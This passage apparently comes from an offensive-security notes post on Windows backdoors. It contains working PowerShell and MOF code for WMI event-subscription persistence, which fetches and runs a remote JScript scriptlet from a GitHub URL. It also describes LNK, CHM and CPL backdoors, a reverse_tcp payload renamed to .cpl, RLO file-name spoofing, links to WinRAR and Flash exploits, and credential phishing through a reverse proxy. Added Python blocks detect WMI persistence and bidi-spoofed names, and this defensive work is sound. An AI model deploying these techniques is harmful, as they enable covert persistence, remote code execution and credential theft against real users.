$StaticClass.Properties.Add('EvilProperty' , "This is payload")
$StaticClass.Put()

Invoking the javascript_backdoor from PowerShell

$filterName = 'filtP1'
$consumerName = 'consP1'
$Command ="GetObject(""script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test"")"


$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"

$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop

$WMIEventConsumer = Set-WmiInstance -Class ActiveScriptEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName;ScriptingEngine='JScript';ScriptText=$Command}

Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}

Invoking the javascript_backdoor from MOF

pragma namespace("\\\\.\\root\\subscription")    

instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP1";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 1";
QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consP1";
ScriptingEngine = "JScript";
ScriptText = "GetObject(\"script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test\")";
};

instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};

Similarly, WMI can be used to run other backdoor programs in combination with these.

For details see this article:
http://www.anquan.us/static/drops/tips-8260.html

WMI can also be driven from

  vbs
  mof
  C / C++
  .Net

and similar means.
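An added example (not from the post or the linked Drops article) for the WMI subscription above: a Python triage routine over records shaped like the root\subscription objects that Get-WmiObject returns, which joins filters to consumers through the bindings and flags script/command consumers, remote scriptlet payloads and timer-style trigger queries. The records are constructed and mirror the filtP1/consP1 pair, next to the SCM event-log subscription that ships with Windows.

```python
import re

# Constructed records shaped like the objects returned by
#   Get-WmiObject -Namespace root\subscription -Class __EventFilter / __EventConsumer / __FilterToConsumerBinding
# (only the properties used here). The first pair copies the filtP1/consP1 example
# above; the second is the default SCM event-log subscription.
FILTERS = [
    {"Name": "filtP1",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"},
    {"Name": "SCM Event Log Filter",
     "Query": "select * from MSFT_SCMEventLogEvent"},
]
CONSUMERS = [
    {"Name": "consP1", "__CLASS": "ActiveScriptEventConsumer", "ScriptingEngine": "JScript",
     "ScriptText": 'GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")'},
    {"Name": "SCM Event Log Consumer", "__CLASS": "NTEventLogEventConsumer"},
]
BINDINGS = [
    {"Filter": '__EventFilter.Name="filtP1"', "Consumer": 'ActiveScriptEventConsumer.Name="consP1"'},
    {"Filter": '__EventFilter.Name="SCM Event Log Filter"', "Consumer": 'NTEventLogEventConsumer.Name="SCM Event Log Consumer"'},
]

# Consumer classes that execute attacker-controlled script or command lines
SCRIPT_CONSUMERS = {"ActiveScriptEventConsumer", "CommandLineEventConsumer"}
# Remote scriptlets, URLs and script hosts inside a consumer payload
PAYLOAD_RE = re.compile(r'GetObject\(\s*"script:|https?://|powershell|rundll32|regsvr32|mshta|wscript|cscript', re.I)
# Timer-like triggers that fire on their own, independent of any user activity
TRIGGER_RE = re.compile(r"__InstanceModificationEvent.*(Win32_LocalTime|Win32_UTCTime|Win32_PerfFormattedData)", re.I | re.S)
NAME_RE = re.compile(r'Name="([^"]*)"')


def ref_name(ref):
    """Instance name out of a WMI object path such as __EventFilter.Name="filtP1"."""
    m = NAME_RE.search(ref)
    return m.group(1) if m else None


def triage(filters, consumers, bindings):
    """One finding per binding whose filter/consumer pair looks like persistence."""
    by_filter = {f["Name"]: f for f in filters}
    by_consumer = {c["Name"]: c for c in consumers}
    findings = []
    for b in bindings:
        flt = by_filter.get(ref_name(b["Filter"]), {})
        con = by_consumer.get(ref_name(b["Consumer"]), {})
        reasons = []
        if con.get("__CLASS") in SCRIPT_CONSUMERS:
            reasons.append("consumer runs script or command line")
        payload = (con.get("ScriptText") or "") + (con.get("CommandLineTemplate") or "")
        if PAYLOAD_RE.search(payload):
            reasons.append("payload references remote scriptlet, URL or script host")
        if TRIGGER_RE.search(flt.get("Query", "")):
            reasons.append("timer-style trigger on a polled system class")
        if reasons:
            findings.append({"filter": flt.get("Name"), "consumer": con.get("Name"), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(FILTERS, CONSUMERS, BINDINGS):
        print(f)
```

Walking the bindings rather than the consumers alone is deliberate: a consumer with no binding never fires, and a binding that points at a missing object is itself worth a look. Sysmon Event IDs 19, 20 and 21 record the same three object types at creation time, so the same checks apply to those events.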

0x05 Lnk Backdoor

See evi1cg's article -> Shortcut_Backdoor
A shortcut executes the file it points to.

Shortcut_gen.exe test.txt test.lnk

Clicking test.lnk then executes the command stored in test.txt.

You can also use evi1cg's script -> https://gist.github.com/Ridter/a360f94d8ac9a8c30227e3812dfbb329

0x06 Chm Backdoor

Same as "Loading JS via CHM" above; the CHM payload is not limited to JS.


Through the Object tag all kinds of shellcode can be executed:
for example regsvr32 to run a dll, mshta to run an hta, running powershell or VBS directly, and so on.
The prerequisite, of course, is proper obfuscation and AV evasion.

0x07 CPL Backdoor

CPL (Control Panel Item)
A CPL file is essentially a DLL, but because it contains the CPLApplet function it becomes a Windows executable.
Although it is executable, it is actually run through shell32.dll.
Several ways to invoke it:

Invoking a cpl from vbs

Dim obj
Set obj = CreateObject("Shell.Application")
obj.ControlPanelItem("test.cpl")

Invoking a cpl from js

var a = new ActiveXObject("Shell.Application");
a.ControlPanelItem("c:\\test\\test.cpl");

Likewise, you can simply generate a dll with msf and rename the extension to .cpl, but a pop-up about a program compatibility problem appears.
Workaround: compile reverse_tcp by hand.

Reference: http://www.anquan.us/static/drops/tips-16042.html

0x08 Windows: reversing file names with Unicode

Quite simple..

Inserting an RLO character reverses the file name; the icon can then be swapped for an image to disguise it better.
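An added example (not from the original post) for the RLO trick: a Python helper that lists the bidi control characters in a file name, approximates the name as a file manager would display it, and compares the displayed extension with the real one. The file names are constructed; the rendering approximation assumes a single RLO as in the screenshot.

```python
import os

# Unicode bidirectional control characters that can change how a name is displayed
BIDI_CONTROLS = {
    "\u202a": "LRE", "\u202b": "RLE", "\u202c": "PDF", "\u202d": "LRO", "\u202e": "RLO",
    "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI", "\u2069": "PDI",
}

# Constructed file names (not from the page): an RLO disguise and a benign image
DISGUISED = "report_\u202egnp.scr"   # displayed as report_rcs.png, runs as a .scr
BENIGN = "photo.png"


def strip_bidi(name):
    """The name with every bidi control removed, i.e. what the file system actually opens."""
    return "".join(ch for ch in name if ch not in BIDI_CONTROLS)


def rendered_name(name):
    """Approximate what a file manager shows: after a lone RLO (the case on this
    page) the remaining characters are drawn right-to-left, i.e. reversed."""
    idx = name.find("\u202e")
    if idx == -1:
        return strip_bidi(name)
    return strip_bidi(name[:idx]) + strip_bidi(name[idx + 1:])[::-1]


def analyze_filename(name):
    """Report bidi controls, the displayed form, the real extension and whether they disagree."""
    controls = [(i, BIDI_CONTROLS[ch]) for i, ch in enumerate(name) if ch in BIDI_CONTROLS]
    rendered = rendered_name(name)
    real_ext = os.path.splitext(strip_bidi(name))[1].lower()
    shown_ext = os.path.splitext(rendered)[1].lower()
    return {
        "controls": controls,
        "rendered_as": rendered,
        "real_extension": real_ext,
        "extension_mismatch": bool(controls) and real_ext != shown_ext,
    }


if __name__ == "__main__":
    for n in (DISGUISED, BENIGN):
        print(analyze_filename(n))
```

The practical mitigation is the first check alone: a file name that contains any character from BIDI_CONTROLS has no legitimate reason to arrive as a mail attachment, so gateways can reject on presence rather than trying to reproduce the rendering.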

0x09 Winrar Backdoor

The well-known CVE-2018-20250.
I have not analyzed the principle yet.. here is a senior classmate's exploit:
https://github.com/WyAtu/CVE-2018-20250

0x10 CVE-2018-4878

Affected versions:
version <= 28.0.0.137
A Flash overflow; just combine it with a script to attack.. HTML5 is everywhere now and Flash is about to retire.

0x11 Nginx 反向代理

Shout-out to passer6y:
https://www.anquanke.com/post/id/150436
Roughly: register a look-alike domain, reverse-proxy the real server, intercept the plaintext passwords, and phish. To be analyzed separately: # Nginx reverse proxy in practice